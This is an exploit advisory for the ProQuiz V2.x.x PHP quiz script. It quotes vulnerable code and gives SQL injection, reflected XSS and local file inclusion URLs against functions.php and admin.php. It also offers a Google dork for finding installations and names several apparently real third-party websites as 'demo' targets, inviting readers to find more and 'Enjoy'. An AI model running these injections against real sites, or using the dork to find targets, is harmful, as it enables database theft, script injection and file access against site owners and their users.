facebook facebook twitter rss

ProQuiz V2.x.x => Multiple Vulnerabilities

Author: JoKeR_StEx , Published: 18-02-2014
##########################################################################
# Exploit Title : ProQuiz V2.x.x => Multiple Vulnerabilities
# Google Dork : [if relevant] (we will automatically add these to the GHDB)
# Date : 15/02/2014
# Exploit Author : JoKeR_StEx
# Vendor Homepage : http://proquiz.softon.org/
# Version : V2.x.x
# Tested on : Windows
# CVE : [~]
###########################################################################
[+] Description :

ProQuize V2.x.x affected by SQL injection and Cross Site Scripting & LFI
The vulnerabilities in parametere username & email in file functions about register

[-] Vulnerable Code :

# Line 610=>634

if(!empty($_GET['username'])){
if($_GET['username']==$_SESSION['UA_DETAILS']['username']){
echo "true";
}else{
if(checkUsernameExists($db,$_GET['username'])){
echo "false";
}else{
echo "true";
}
}

}

if(!empty($_GET['email'])){
if($_GET['email']==$_SESSION['UA_DETAILS']['email']){
echo "true";
}else{
if(checkEmailExists($db,$_GET['email'])){
echo "false";
}else{
echo "true";
}
}

}
The Vulnerability in para username : the coder use function CheckUsernameExists() for get username
for confirm if already exists use var $db from class database in file Database.class.php and para2 $_GET['username']
for get info for confirm

The Same Things With email;

[+] Exploit

Dork: "Powered by Softon Technologies"

1-Sql injection
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?username=[SQli]
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?email=[SQli]


2-Cross Site scripting
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?username=%22%3E%3Cscript%3Ealert%28%27Xss%27%29;%3C/script%3E
http://127.0.0.1/ProQuiz%20V2.0.1/functions.php?email=%22%3E%3Cscript%3Ealert%28%27Xss%27%29;%3C/script%3E

3-LFI
About LFI IN THE file admin.php
code :
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
}else{
echo getContents($db,'admin_panel');
}
http://127.0.0.1/ProQuiz%20V2.0.1/admin.php?action=getpage&page=[file]
when you include file don't create the type of the file just put the name of the file
because you can only include php file

[+] Demo :
http://webexamiq.com/functions.php?username=[SQLI]or[XSS]
http://webexamiq.com/functions.php?email=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?username=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?email=[SQLI]or[XSS]
http://effchurch.org/pquiz/functions.php?username=[SQLI]or[XSS]

You Can Find More Websites Infected In Google ^____^'


^___-' Enjoy ^____^

###################
http://www.th3xploiterz.com/
The Black Devils
Dz Crazy L33ts
###################
###########################Gr33tings################################################################
Gr33t'z to : Assesino04, Shield Dz, Eve Dized , Dr.0ryx & My Familly & All Algerians and My Friends
####################################################################################################
Email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx

Like us on Facebook :